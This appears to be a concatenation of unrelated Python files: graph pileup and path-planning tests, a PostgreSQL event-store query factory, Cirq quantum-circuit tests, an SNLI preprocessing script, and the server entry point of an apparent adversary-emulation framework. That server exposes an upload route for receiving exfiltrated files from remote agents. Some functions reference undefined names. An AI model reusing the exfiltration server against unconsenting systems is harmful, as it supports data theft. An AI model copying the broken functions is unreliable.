self.graph = Graph({1: Block(5), 2: Block(5), 3: Block(5)}, {1: [2], 2: [3]})
def test_single_fragment(self):
self.correct_pileup = from_intervals(self.graph,
[
Interval(0, 5, [1, 2, 3]),
Interval(0, 5, [1, 2, 3])
]
)
self.fragments = [Interval(0, 5, [1, 2, 3])]
self.do_asserts()
class TestSplitGraph(TestCase):
def read_length(self):
return 5
def fragment_length(self):
return 15
def set_graph(self):
self.graph = Graph({1: Block(5), 2: Block(5), 3: Block(5), 4: Block(5)},
{1: [2, 3], 2: [4], 3: [4]})
def test_single_fragment(self):
self.correct_pileup = from_intervals(self.graph,
[
Interval(0, 5, [1, 2, 4]),
Interval(0, 5, [1, 2, 4]),
Interval(0, 5, [3]),
Interval(0, 5, [3])
]
)
self.fragments = [Interval(0, 5, [1, 2, 4])]
self.do_asserts()
class TestSplitGraph2(TestCase):
def read_length(self):
return 6
def fragment_length(self):
return 15
def set_graph(self):
self.graph = Graph(
{1: Block(5), 2: Block(5), 3: Block(5), 4: Block(5)},
{1: [2, 3], 2: [4], 3: [4]})
def test_single_fragment(self):
self.correct_pileup = from_intervals(self.graph,
[
Interval(0, 5, [1, 2, 4]),
Interval(0, 5, [1, 2, 4]),
]
)
self.fragments = [Interval(0, 5, [1, 2, 4])]
self.do_asserts()
if __name__ == "__main__":
unittest.main()
|
import argparse
import asyncio
import logging
import pathlib
import sys
import yaml
from aiohttp import web
from app.api.rest_api import RestApi
from app.service.app_svc import AppService
from app.service.auth_svc import AuthService
from app.service.contact_svc import ContactService
from app.service.data_svc import DataService
from app.service.file_svc import FileSvc
from app.service.planning_svc import PlanningService
from app.service.rest_svc import RestService
def set_logging_state():
logging.getLogger('aiohttp.access').setLevel(logging.FATAL)
logging.getLogger('aiohttp_session').setLevel(logging.FATAL)
logging.getLogger('aiohttp.server').setLevel(logging.FATAL)
logging.getLogger('asyncio').setLevel(logging.FATAL)
if cfg['debug']:
logging.getLogger().setLevel(logging.DEBUG)
logging.getLogger('aiohttp.server').setLevel(logging.DEBUG)
logging.getLogger('asyncio').setLevel(logging.DEBUG)
logging.debug('Agents will be considered untrusted after %s seconds of silence' % cfg['untrusted_timer'])
logging.debug('Uploaded files will be put in %s' % cfg['exfil_dir'])
logging.debug('Serving at http://%s:%s' % (cfg['host'], cfg['port']))
async def build_docs():
process = await asyncio.create_subprocess_exec('sphinx-build', 'docs/', 'docs/_build/html',
'-b', 'html', '-c', 'docs/',
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
stdout, stderr = await process.communicate()
if process.returncode != 0:
logging.warning('Unable to refresh docs')
if cfg['debug']:
logging.debug(stderr)
else:
logging.info('Successfully rebuilt documentation.')
async def start_server(config, services):
app = services.get('app_svc').application
await auth_svc.apply(app, config['users'])
app.router.add_route('*', '/file/download', services.get('file_svc').download)
app.router.add_route('POST', '/file/upload', services.get('file_svc').upload_exfil)
app.router.add_static('/docs/', 'docs/_build/html', append_version=True)
runner = web.AppRunner(app)
await runner.setup()
await web.TCPSite(runner, config['host'], config['port']).start()
def main(services, config):
loop = asyncio.get_event_loop()
loop.run_until_complete(data_svc.restore_state())
loop.run_until_complete(RestApi(services).enable())
loop.run_until_complete(app_svc.load_plugins())
loop.run_until_complete(data_svc.load_data(directory='data'))
loop.create_task(build_docs())
loop.create_task(app_svc.start_sniffer_untrusted_agents())
loop.create_task(app_svc.resume_operations())
loop.create_task(app_svc.run_scheduler())
loop.run_until_complete(start_server(config, services))
try:
print('All systems ready. Navigate to http://%s:%s to log in.' % (config['host'], config['port']))
loop.run_forever()
except KeyboardInterrupt:
loop.run_until_complete(services.get('data_svc').save_state())
logging.debug('[!] shutting down server...good-bye')
if __name__ == '__main__':
sys.path.append('')
parser = argparse.ArgumentParser('Welcome to the system')
parser.add_argument('-E', '--environment', required=False, default='local', help='Select an env. file to use')
parser.add_argument('--fresh', action='store_true', required=False, default=False,
help='remove object_store on start')
args = parser.parse_args()
config = args.environment if pathlib.Path('conf/%s.yml' % args.environment).exists() else 'default'
with open('conf/%s.yml' % config) as c:
cfg = yaml.load(c, Loader=yaml.FullLoader)
set_logging_state()
data_svc = DataService()
contact_svc = ContactService()
planning_svc = PlanningService()
rest_svc = RestService()
auth_svc = AuthService(cfg['api_key'])
file_svc = FileSvc(cfg['exfil_dir'])
app_svc = AppService(application=web.Application(), config=cfg)
if args.fresh:
asyncio.get_event_loop().run_until_complete(data_svc.destroy())
main(config=cfg, services=app_svc.get_services())
|
<filename>power_planner/graphs/tests/test_ksp.py
import unittest
import numpy as np
from types import SimpleNamespace
from power_planner.graphs.weighted_ksp import WeightedKSP
from power_planner.graphs.implicit_lg import ImplicitLG
from power_planner.ksp import KSP
class TestKsp(unittest.TestCase):
expl_shape = (50, 50)
start_inds = np.array([6, 6])
dest_inds = np.array([44, 40])
# create configuration
cfg = SimpleNamespace()
cfg.PYLON_DIST_MIN = 3
cfg.PYLON_DIST_MAX = 5
cfg.start_inds = start_inds
cfg.dest_inds = dest_inds
cfg.ANGLE_WEIGHT = 0.25
cfg.EDGE_WEIGHT = 0
cfg.MAX_ANGLE = np.pi / 2
cfg.MAX_ANGLE_LG = np.pi / 4
cfg.layer_classes = ["dummy_class"]
cfg.class_weights = [1]
# construct random cost surface to assure that lg and impl output same
example3 = np.random.rand(*expl_shape)
# constuct hard_cons with padding
hard_cons = np.ones(expl_shape)
hard_cons[:, :5] = 0
hard_cons[:, -5:] = 0
hard_cons[:5, :] = 0
hard_cons[-5:, :] = 0
def test_ksp(self) -> None:
wg = WeightedKSP(np.array([self.example3]), self.hard_cons, verbose=0)
bestpath, _, best_cost_sum = wg.single_sp(**vars(self.cfg))
wg.get_shortest_path_tree()
best2, _, best_cost_sum2 = wg.transform_path(wg.best_path)
# assert that SP tree path is optimal one
for b in range(len(best2)):
self.assertListEqual(list(best2[b]), list(bestpath[b]))
self.assertEqual(best_cost_sum, best_cost_sum2)
# TEST DIVERSE
ksp = wg.dispersion_ksp(
9, cost_thresh=1.05, dist_mode="eucl_mean", count_thresh=3
)
for k in ksp:
path = k[0]
self.assertListEqual(list(self.start_inds), list(path[0]))
self.assertListEqual(list(self.dest_inds), list(path[-1]))
cost = k[2]
# print(k[1])
self.assertLessEqual(cost, best_cost_sum * 1.05)
# TEST LC KSP
# ksp = graph.k_shortest_paths(source_v, target_v, cfg.KSP)
# TODO
def compare_ksp(self) -> None:
max_angle_lg = np.pi
# get impl lg ksp
impl_lg = ImplicitLG(
np.array([self.example3]), self.hard_cons, verbose=0
)
_ = impl_lg.sp_trees(**vars(self.cfg))
ksp = KSP(impl_lg)
ksp_lg = ksp.find_ksp(10)
# get weighted ksp
wg_graph = WeightedKSP(
np.array([self.example3]), self.hard_cons, verbose=0
)
bestpath, _, best_cost_sum = wg.single_sp(**vars(self.cfg))
wg_graph.get_shortest_path_tree()
ksp_wg = wg_graph.find_ksp(10)
for k in range(10):
path1 = ksp_wg[k][0]
path2 = ksp_lg[k][0]
for p in range(len(path1)):
self.assertListEqual(list(path1[p]), list(path2[p]))
# # test that all fulfill hard constraints
# paths = [k[0] for k in ksp]
# for p in paths:
# p = np.array(p)
# plt.scatter(p[:,1], p[:,0])
# for (i,j) in p:
# self.assertEqual(instance_corr[i,j],0)
if __name__ == "__main__":
unittest.main()
|
<filename>packages/plugins/minos-database-aiopg/minos/plugins/aiopg/factories/aggregate/events.py<gh_stars>100-1000
from collections.abc import (
Iterable,
)
from datetime import (
datetime,
)
from typing import (
Any,
Optional,
)
from uuid import (
UUID,
)
from psycopg2.sql import (
SQL,
Composable,
Identifier,
Literal,
Placeholder,
)
from minos.aggregate import (
Action,
EventDatabaseOperationFactory,
)
from minos.common import (
ComposedDatabaseOperation,
DatabaseOperation,
)
from ...clients import (
AiopgDatabaseClient,
)
from ...operations import (
AiopgDatabaseOperation,
)
# noinspection SqlNoDataSourceInspection,SqlResolve,PyMethodMayBeStatic
class AiopgEventDatabaseOperationFactory(EventDatabaseOperationFactory):
"""Aiopg Event Database Operation Factory class."""
def build_table_name(self) -> str:
"""Get the table name.
:return: A ``str`` value.
"""
return "aggregate_event"
def build_create(self) -> DatabaseOperation:
"""Build the database operation to create the event table.
:return: A ``DatabaseOperation`` instance.s
"""
return ComposedDatabaseOperation(
[
AiopgDatabaseOperation(
'CREATE EXTENSION IF NOT EXISTS "uuid-ossp";',
lock="uuid-ossp",
),
AiopgDatabaseOperation(
"""
DO
$$
BEGIN
IF NOT EXISTS(SELECT *
FROM pg_type typ
INNER JOIN pg_namespace nsp
ON nsp.oid = typ.typnamespace
WHERE nsp.nspname = current_schema()
AND typ.typname = 'action_type') THEN
CREATE TYPE action_type AS ENUM ('create', 'update', 'delete');
END IF;
END;
$$
LANGUAGE plpgsql;
""",
lock=self.build_table_name(),
),
AiopgDatabaseOperation(
f"""
CREATE TABLE IF NOT EXISTS {self.build_table_name()} (
id BIGSERIAL PRIMARY KEY,
action ACTION_TYPE NOT NULL,
uuid UUID NOT NULL,
name TEXT NOT NULL,
version INT NOT NULL,
data BYTEA NOT NULL,
created_at TIMESTAMPTZ NOT NULL,
transaction_uuid UUID NOT NULL DEFAULT uuid_nil(),
UNIQUE (uuid, version, transaction_uuid)
);
""",
lock=self.build_table_name(),
),
]
)
def build_submit(
self,
transaction_uuids: Iterable[UUID],
uuid: UUID,
action: Action,
name: str,
version: int,
data: bytes,
created_at: datetime,
transaction_uuid: UUID,
lock: Optional[str],
**kwargs,
) -> DatabaseOperation:
"""Build the database operation to submit a row into the event table.
:param transaction_uuids: The sequence of nested transaction in on top of the current event's transaction.
:param uuid: The identifier of the entity.
:param action: The action of the event.
:param name: The name of the entity.
:param version: The version of the entity
:param data: The data of the event.
:param created_at: The creation datetime.
:param transaction_uuid: The identifier of the transaction.
:param lock: The lock identifier.
:param kwargs: Additional named arguments.
:return: A ``DatabaseOperation`` instance.
"""
insert_values = SQL(
"""
INSERT INTO {table_name} (id, action, uuid, name, version, data, created_at, transaction_uuid)
VALUES (
default,
%(action)s,
CASE %(uuid)s WHEN uuid_nil() THEN uuid_generate_v4() ELSE %(uuid)s END,
%(name)s,
(
SELECT (CASE WHEN %(version)s IS NULL THEN 1 + COALESCE(MAX(t2.version), 0) ELSE %(version)s END)
FROM (
SELECT DISTINCT ON (t1.uuid) t1.version
FROM ( {from_parts} ) AS t1
ORDER BY t1.uuid, t1.transaction_index DESC
) AS t2
),
%(data)s,
(CASE WHEN %(created_at)s IS NULL THEN NOW() ELSE %(created_at)s END),
%(transaction_uuid)s
)
RETURNING id, uuid, version, created_at;
"""
)
insert_parameters = {
"uuid": uuid,
"action": action,
"name": name,
"version": version,
"data": data,
"created_at": created_at,
"transaction_uuid": transaction_uuid,
}
from_sql, from_parameters = self._build_submit_from(transaction_uuids)
query = insert_values.format(from_parts=from_sql, table_name=Identifier(self.build_table_name()))
parameters = from_parameters | insert_parameters
return AiopgDatabaseOperation(query, parameters, lock)
def _build_submit_from(self, transaction_uuids: Iterable[UUID]) -> tuple[Composable, dict[str, Any]]:
select_transaction = SQL(
"""
SELECT {index} AS transaction_index, uuid, MAX(version) AS version
FROM {table_name}
WHERE uuid = %(uuid)s AND transaction_uuid = {transaction_uuid}
GROUP BY uuid
"""
)
from_query_parts = list()
parameters = dict()
for index, transaction_uuid in enumerate(transaction_uuids, start=1):
name = f"transaction_uuid_{index}"
parameters[name] = transaction_uuid
from_query_parts.append(
select_transaction.format(
index=Literal(index),
transaction_uuid=Placeholder(name),
table_name=Identifier(self.build_table_name()),
),
)
query = SQL(" UNION ALL ").join(from_query_parts)
return query, parameters
# noinspection PyShadowingBuiltins
def build_query(
self,
uuid: Optional[UUID] = None,
name: Optional[str] = None,
version: Optional[int] = None,
version_lt: Optional[int] = None,
version_gt: Optional[int] = None,
version_le: Optional[int] = None,
version_ge: Optional[int] = None,
id: Optional[int] = None,
id_lt: Optional[int] = None,
id_gt: Optional[int] = None,
id_le: Optional[int] = None,
id_ge: Optional[int] = None,
transaction_uuid: Optional[UUID] = None,
transaction_uuid_ne: Optional[UUID] = None,
transaction_uuid_in: Optional[Iterable[UUID, ...]] = None,
**kwargs,
) -> DatabaseOperation:
"""Build the database operation to select rows.
:param uuid: The identifier must be equal to the given value.
:param name: The classname must be equal to the given value.
:param version: The version must be equal to the given value.
:param version_lt: The version must be lower than the given value.
:param version_gt: The version must be greater than the given value.
:param version_le: The version must be lower or equal to the given value.
:param version_ge: The version must be greater or equal to the given value.
:param id: The entry identifier must be equal to the given value.
:param id_lt: The entry identifier must be lower than the given value.
:param id_gt: The entry identifier must be greater than the given value.
:param id_le: The entry identifier must be lower or equal to the given value.
:param id_ge: The entry identifier must be greater or equal to the given value.
:param transaction_uuid: The transaction identifier must be equal to the given value.
:param transaction_uuid_ne: The transaction identifier must be distinct of the given value.
:param transaction_uuid_in: The destination transaction identifier must be equal to one of the given values.
:return: A ``DatabaseOperation`` instance.
"""
if transaction_uuid_in is not None:
transaction_uuid_in = tuple(transaction_uuid_in)
_select_all = f"""
SELECT uuid, name, version, data, id, action, created_at, transaction_uuid
FROM {self.build_table_name()}
"""
conditions = list()
if uuid is not None:
conditions.append("uuid = %(uuid)s")
if name is not None:
conditions.append("name = %(name)s")
if version is not None:
conditions.append("version = %(version)s")
if version_lt is not None:
conditions.append("version < %(version_lt)s")
if version_gt is not None:
conditions.append("version > %(version_gt)s")
if version_le is not None:
conditions.append("version <= %(version_le)s")
if version_ge is not None:
conditions.append("version >= %(version_ge)s")
if id is not None:
conditions.append("id = %(id)s")
if id_lt is not None:
conditions.append("id < %(id_lt)s")
if id_gt is not None:
conditions.append("id > %(id_gt)s")
if id_le is not None:
conditions.append("id <= %(id_le)s")
if id_ge is not None:
conditions.append("id >= %(id_ge)s")
if transaction_uuid is not None:
conditions.append("transaction_uuid = %(transaction_uuid)s")
if transaction_uuid_ne is not None:
conditions.append("transaction_uuid <> %(transaction_uuid_ne)s")
if transaction_uuid_in is not None:
conditions.append("transaction_uuid IN %(transaction_uuid_in)s")
if not conditions:
return AiopgDatabaseOperation(f"{_select_all} ORDER BY id;")
return AiopgDatabaseOperation(
f"{_select_all} WHERE {' AND '.join(conditions)} ORDER BY id;",
{
"uuid": uuid,
"name": name,
"version": version,
"version_lt": version_lt,
"version_gt": version_gt,
"version_le": version_le,
"version_ge": version_ge,
"id": id,
"id_lt": id_lt,
"id_gt": id_gt,
"id_le": id_le,
"id_ge": id_ge,
"transaction_uuid": transaction_uuid,
"transaction_uuid_ne": transaction_uuid_ne,
"transaction_uuid_in": transaction_uuid_in,
},
)
def build_query_offset(self) -> DatabaseOperation:
"""Build the database operation to get the maximum identifier.
:return: A ``DatabaseOperation`` instance.
"""
return AiopgDatabaseOperation(f"SELECT MAX(id) FROM {self.build_table_name()};".strip())
AiopgDatabaseClient.set_factory(EventDatabaseOperationFactory, AiopgEventDatabaseOperationFactory)
|
<gh_stars>0
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union, Tuple, cast
import itertools
import numpy as np
import pytest
import sympy
import cirq
from cirq import protocols
from cirq.type_workarounds import NotImplementedType
class GateUsingWorkspaceForApplyUnitary(cirq.SingleQubitGate):
def _apply_unitary_(self, args: cirq.ApplyUnitaryArgs) -> Union[np.ndarray, NotImplementedType]:
args.available_buffer[...] = args.target_tensor
args.target_tensor[...] = 0
return args.available_buffer
def _unitary_(self):
return np.eye(2)
def __eq__(self, other):
return isinstance(other, type(self))
def __repr__(self):
return 'cirq.ops.controlled_operation_test.GateUsingWorkspaceForApplyUnitary()'
class GateAllocatingNewSpaceForResult(cirq.SingleQubitGate):
def _apply_unitary_(self, args: cirq.ApplyUnitaryArgs) -> Union[np.ndarray, NotImplementedType]:
assert len(args.axes) == 1
a = args.axes[0]
seed = cast(Tuple[Union[int, slice, 'ellipsis'], ...], (slice(None),))
zero = seed * a + (0, Ellipsis)
one = seed * a + (1, Ellipsis)
result = np.zeros(args.target_tensor.shape, args.target_tensor.dtype)
result[zero] = args.target_tensor[zero] * 2 + args.target_tensor[one] * 3
result[one] = args.target_tensor[zero] * 5 + args.target_tensor[one] * 7
return result
def _unitary_(self):
return np.array([[2, 3], [5, 7]])
def __eq__(self, other):
return isinstance(other, type(self))
def __repr__(self):
return 'cirq.ops.controlled_operation_test.GateAllocatingNewSpaceForResult()'
def test_controlled_operation_init():
cb = cirq.NamedQubit('ctr')
q = cirq.NamedQubit('q')
g = cirq.SingleQubitGate()
v = cirq.GateOperation(g, (q,))
c = cirq.ControlledOperation([cb], v)
assert c.sub_operation == v
assert c.controls == (cb,)
assert c.qubits == (cb, q)
assert c == c.with_qubits(cb, q)
assert c.control_values == ((1,),)
assert cirq.qid_shape(c) == (2, 2)
c = cirq.ControlledOperation([cb], v, control_values=[0])
assert c.sub_operation == v
assert c.controls == (cb,)
assert c.qubits == (cb, q)
assert c == c.with_qubits(cb, q)
assert c.control_values == ((0,),)
assert cirq.qid_shape(c) == (2, 2)
c = cirq.ControlledOperation([cb.with_dimension(3)], v)
assert c.sub_operation == v
assert c.controls == (cb.with_dimension(3),)
assert c.qubits == (cb.with_dimension(3), q)
assert c == c.with_qubits(cb.with_dimension(3), q)
assert c.control_values == ((1,),)
assert cirq.qid_shape(c) == (3, 2)
with pytest.raises(ValueError, match=r'len\(control_values\) != len\(controls\)'):
_ = cirq.ControlledOperation([cb], v, control_values=[1, 1])
with pytest.raises(ValueError, match='Control values .*outside of range'):
_ = cirq.ControlledOperation([cb], v, control_values=[2])
with pytest.raises(ValueError, match='Control values .*outside of range'):
_ = cirq.ControlledOperation([cb], v, control_values=[(1, -1)])
def test_controlled_operation_eq():
c1 = cirq.NamedQubit('c1')
q1 = cirq.NamedQubit('q1')
c2 = cirq.NamedQubit('c2')
eq = cirq.testing.EqualsTester()
eq.make_equality_group(lambda: cirq.ControlledOperation([c1], cirq.X(q1)))
eq.make_equality_group(lambda: cirq.ControlledOperation([c2], cirq.X(q1)))
eq.make_equality_group(lambda: cirq.ControlledOperation([c1], cirq.Z(q1)))
eq.add_equality_group(cirq.ControlledOperation([c2], cirq.Z(q1)))
eq.add_equality_group(
cirq.ControlledOperation([c1, c2], cirq.Z(q1)),
cirq.ControlledOperation([c2, c1], cirq.Z(q1)),
)
eq.add_equality_group(
cirq.ControlledOperation(
[c1, c2.with_dimension(3)], cirq.Z(q1), control_values=[1, (0, 2)]
),
cirq.ControlledOperation(
[c2.with_dimension(3), c1], cirq.Z(q1), control_values=[(2, 0), 1]
),
)
def test_str():
c1 = cirq.NamedQubit('c1')
c2 = cirq.NamedQubit('c2')
q2 = cirq.NamedQubit('q2')
assert str(cirq.ControlledOperation([c1], cirq.CZ(c2, q2))) == "CCZ(c1, c2, q2)"
class SingleQubitOp(cirq.Operation):
def qubits(self) -> Tuple[cirq.Qid, ...]:
pass
def with_qubits(self, *new_qubits: cirq.Qid):
pass
def __str__(self):
return "Op(q2)"
assert str(cirq.ControlledOperation([c1, c2], SingleQubitOp())) == "CC(c1, c2, Op(q2))"
assert (
str(cirq.ControlledOperation([c1, c2.with_dimension(3)], SingleQubitOp()))
== "CC(c1, c2 (d=3), Op(q2))"
)
assert (
str(
cirq.ControlledOperation(
[c1, c2.with_dimension(3)], SingleQubitOp(), control_values=[1, (2, 0)]
)
)
== "C1C02(c1, c2 (d=3), Op(q2))"
)
def test_repr():
a, b, c, d = cirq.LineQubit.range(4)
ch = cirq.H(a).controlled_by(b)
cch = cirq.H(a).controlled_by(b, c)
ccz = cirq.ControlledOperation([a], cirq.CZ(b, c))
c1c02z = cirq.ControlledOperation(
[a, b.with_dimension(3)], cirq.CZ(d, c), control_values=[1, (2, 0)]
)
assert repr(ch) == ('cirq.H(cirq.LineQubit(0)).controlled_by(cirq.LineQubit(1))')
cirq.testing.assert_equivalent_repr(ch)
cirq.testing.assert_equivalent_repr(cch)
cirq.testing.assert_equivalent_repr(ccz)
cirq.testing.assert_equivalent_repr(c1c02z)
# A contrived multiqubit Hadamard gate that asserts the consistency of
# the passed in Args and puts an H on all qubits
# displays them as 'H(qubit)' on the wire
class MultiH(cirq.Gate):
def __init__(self, num_qubits):
self._num_qubits = num_qubits
def num_qubits(self) -> int:
return self._num_qubits
def _circuit_diagram_info_(
self, args: protocols.CircuitDiagramInfoArgs
) -> protocols.CircuitDiagramInfo:
assert args.known_qubit_count is not None
assert args.known_qubits is not None
return protocols.CircuitDiagramInfo(
wire_symbols=tuple(f'H({q})' for q in args.known_qubits), connected=True
)
def test_circuit_diagram():
qubits = cirq.LineQubit.range(3)
c = cirq.Circuit()
c.append(cirq.ControlledOperation(qubits[:1], MultiH(2)(*qubits[1:])))
cirq.testing.assert_has_diagram(
c,
"""
0: ───@──────
│
1: ───H(1)───
│
2: ───H(2)───
""",
)
c = cirq.Circuit()
c.append(cirq.ControlledOperation(qubits[:2], MultiH(1)(*qubits[2:])))
cirq.testing.assert_has_diagram(
c,
"""
0: ───@──────
│
1: ───@──────
│
2: ───H(2)───
""",
)
qubits = cirq.LineQid.for_qid_shape((3, 3, 3, 2))
c = cirq.Circuit()
c.append(
cirq.ControlledOperation(
qubits[:3], MultiH(1)(*qubits[3:]), control_values=[1, (0, 1), (2, 0)]
)
)
cirq.testing.assert_has_diagram(
c,
"""
0 (d=3): ───@────────────
│
1 (d=3): ───(0,1)────────
│
2 (d=3): ───(0,2)────────
│
3 (d=2): ───H(3 (d=2))───
""",
)
class MockGate(cirq.testing.TwoQubitGate):
def __init__(self, exponent_qubit_index=None):
self._exponent_qubit_index = exponent_qubit_index
def _circuit_diagram_info_(
self, args: protocols.CircuitDiagramInfoArgs
) -> protocols.CircuitDiagramInfo:
self.captured_diagram_args = args
return cirq.CircuitDiagramInfo(
wire_symbols=tuple(['M1', 'M2']),
exponent=1,
exponent_qubit_index=self._exponent_qubit_index,
connected=True,
)
def test_controlled_diagram_exponent():
for q in itertools.permutations(cirq.LineQubit.range(5)):
for idx in [None, 0, 1]:
op = MockGate(idx)(*q[:2]).controlled_by(*q[2:])
add = 0 if idx is None else idx
assert cirq.circuit_diagram_info(op).exponent_qubit_index == len(q[2:]) + add
def test_uninformed_circuit_diagram_info():
qbits = cirq.LineQubit.range(3)
mock_gate = MockGate()
c_op = cirq.ControlledOperation(qbits[:1], mock_gate(*qbits[1:]))
args = protocols.CircuitDiagramInfoArgs.UNINFORMED_DEFAULT
assert cirq.circuit_diagram_info(c_op, args) == cirq.CircuitDiagramInfo(
wire_symbols=('@', 'M1', 'M2'), exponent=1, connected=True, exponent_qubit_index=1
)
assert mock_gate.captured_diagram_args == args
def test_non_diagrammable_subop():
qbits = cirq.LineQubit.range(2)
class UndiagrammableGate(cirq.SingleQubitGate):
pass
undiagrammable_op = UndiagrammableGate()(qbits[1])
c_op = cirq.ControlledOperation(qbits[:1], undiagrammable_op)
assert cirq.circuit_diagram_info(c_op, default=None) is None
@pytest.mark.parametrize(
'gate',
[
cirq.X(cirq.NamedQubit('q1')),
cirq.X(cirq.NamedQubit('q1')) ** 0.5,
cirq.rx(np.pi)(cirq.NamedQubit('q1')),
cirq.rx(np.pi / 2)(cirq.NamedQubit('q1')),
cirq.Z(cirq.NamedQubit('q1')),
cirq.H(cirq.NamedQubit('q1')),
cirq.CNOT(cirq.NamedQubit('q1'), cirq.NamedQubit('q2')),
cirq.SWAP(cirq.NamedQubit('q1'), cirq.NamedQubit('q2')),
cirq.CCZ(cirq.NamedQubit('q1'), cirq.NamedQubit('q2'), cirq.NamedQubit('q3')),
cirq.ControlledGate(cirq.ControlledGate(cirq.CCZ))(*cirq.LineQubit.range(5)),
GateUsingWorkspaceForApplyUnitary()(cirq.NamedQubit('q1')),
GateAllocatingNewSpaceForResult()(cirq.NamedQubit('q1')),
],
)
def test_controlled_operation_is_consistent(gate: cirq.GateOperation):
cb = cirq.NamedQubit('ctr')
cgate = cirq.ControlledOperation([cb], gate)
cirq.testing.assert_implements_consistent_protocols(cgate)
cgate = cirq.ControlledOperation([cb], gate, control_values=[0])
cirq.testing.assert_implements_consistent_protocols(cgate)
cb3 = cb.with_dimension(3)
cgate = cirq.ControlledOperation([cb3], gate, control_values=[(0, 2)])
cirq.testing.assert_implements_consistent_protocols(cgate)
@pytest.mark.parametrize('resolve_fn', [cirq.resolve_parameters, cirq.resolve_parameters_once])
def test_parameterizable(resolve_fn):
a = sympy.Symbol('a')
qubits = cirq.LineQubit.range(3)
cz = cirq.ControlledOperation(qubits[:1], cirq.Z(qubits[1]))
cza = cirq.ControlledOperation(qubits[:1], cirq.ZPowGate(exponent=a)(qubits[1]))
assert cirq.is_parameterized(cza)
assert not cirq.is_parameterized(cz)
assert resolve_fn(cza, cirq.ParamResolver({'a': 1})) == cz
def test_bounded_effect():
qubits = cirq.LineQubit.range(3)
cy = cirq.ControlledOperation(qubits[:1], cirq.Y(qubits[1]))
assert cirq.trace_distance_bound(cy ** 0.001) < 0.01
foo = sympy.Symbol('foo')
scy = cirq.ControlledOperation(qubits[:1], cirq.Y(qubits[1]) ** foo)
assert cirq.trace_distance_bound(scy) == 1.0
assert cirq.approx_eq(cirq.trace_distance_bound(cy), 1.0)
mock = cirq.ControlledOperation(qubits[:1], MockGate().on(*qubits[1:]))
assert cirq.approx_eq(cirq.trace_distance_bound(mock), 1)
def test_controlled_operation_gate():
gate = cirq.X.controlled(control_values=[0, 1], control_qid_shape=[2, 3])
op = gate.on(cirq.LineQubit(0), cirq.LineQid(1, 3), cirq.LineQubit(2))
assert op.gate == gate
class Gateless(cirq.Operation):
@property
def qubits(self):
return () # coverage: ignore
def with_qubits(self, *new_qubits):
return self # coverage: ignore
op = Gateless().controlled_by(cirq.LineQubit(0))
assert op.gate is None
def test_controlled_mixture():
a, b = cirq.LineQubit.range(2)
class NoDetails(cirq.Operation):
@property
def qubits(self):
return (a,)
def with_qubits(self, *new_qubits):
raise NotImplementedError()
c_no = cirq.ControlledOperation(
controls=[b],
sub_operation=NoDetails(),
)
assert not cirq.has_mixture(c_no)
assert cirq.mixture(c_no, None) is None
c_yes = cirq.ControlledOperation(
controls=[b],
sub_operation=cirq.phase_flip(0.25).on(a),
)
assert cirq.has_mixture(c_yes)
assert cirq.approx_eq(
cirq.mixture(c_yes),
[
(0.75, np.eye(4)),
(0.25, cirq.unitary(cirq.CZ)),
],
)
def test_setters_deprecated():
q0, q1, q2 = cirq.LineQubit.range(3)
op = cirq.ControlledOperation([q1], cirq.Z(q0))
with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
op.sub_operation = cirq.X(q0)
assert op.sub_operation == cirq.X(q0)
with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
op.controls = (q2,)
assert op.controls == (q2,)
with cirq.testing.assert_deprecated('mutators', deadline='v0.15'):
op.control_values = ((3,), (3,))
assert op.control_values == ((3,), (3,))
|
<gh_stars>10-100
'''This models is an example for training a classifier on SNLI'''
from __future__ import print_function
from os.path import join
import nltk
import numpy as np
import os
import urllib
import zipfile
import sys
from spodernet.hooks import AccuracyHook, LossHook, ETAHook
from spodernet.preprocessing.pipeline import Pipeline
from spodernet.preprocessing.processors import AddToVocab, CreateBinsByNestedLength, SaveLengthsToState, ConvertTokenToIdx, StreamToHDF5, Tokenizer, NaiveNCharTokenizer
from spodernet.preprocessing.processors import JsonLoaderProcessors, DictKey2ListMapper, RemoveLineOnJsonValueCondition, ToLower
from spodernet.preprocessing.batching import StreamBatcher
from spodernet.utils.logger import Logger, LogLevel
from spodernet.utils.global_config import Config, Backends
from spodernet.utils.util import get_data_path
from spodernet.frontend import Model, PairedBiDirectionalLSTM, SoftmaxCrossEntropy, Embedding, Trainer
Config.parse_argv(sys.argv)
np.set_printoptions(suppress=True)
def download_snli():
'''Creates data and snli paths and downloads SNLI in the home dir'''
home = os.environ['HOME']
data_dir = join(home, '.data')
snli_dir = join(data_dir, 'snli')
snli_url = 'http://nlp.stanford.edu/projects/snli/snli_1.0.zip'
if not os.path.exists(data_dir):
os.mkdir(data_dir)
if not os.path.exists(snli_dir):
os.mkdir(snli_dir)
if not os.path.exists(join(data_dir, 'snli_1.0.zip')):
print('Downloading SNLI...')
snlidownload = urllib.URLopener()
snlidownload.retrieve(snli_url, join(data_dir, "snli_1.0.zip"))
print('Opening zip file...')
archive = zipfile.ZipFile(join(data_dir, 'snli_1.0.zip'), 'r')
return archive, snli_dir
def snli2json():
'''Preprocesses SNLI data and returns to spoder files'''
files = ['snli_1.0_train.jsonl', 'snli_1.0_dev.jsonl',
'snli_1.0_test.jsonl']
archive, snli_dir = download_snli()
new_files = ['train.data', 'dev.data', 'test.data']
names = ['train', 'dev', 'test']
if not os.path.exists(join(snli_dir, new_files[0])):
for name, new_name in zip(files, new_files):
print('Writing {0}...'.format(new_name))
archive = zipfile.ZipFile(join(data_dir, 'snli_1.0.zip'), 'r')
snli_file = archive.open(join('snli_1.0', name), 'r')
with open(join(snli_dir, new_name), 'w') as datafile:
for line in snli_file:
data = json.loads((line))
if data['gold_label'] == '-':
continue
premise = data['sentence1']
hypothesis = data['sentence2']
target = data['gold_label']
datafile.write(
json.dumps([premise, hypothesis, target]) + '\n')
return [names, [join(snli_dir, new_name) for new_name in new_files]]
def preprocess_SNLI(delete_data=False):
# load data
#names, file_paths = snli2json()
#train_path, dev_path, test_path = file_paths
tokenizer = nltk.tokenize.WordPunctTokenizer()
zip_path = join(get_data_path(), 'snli_1.0.zip', 'snli_1.0')
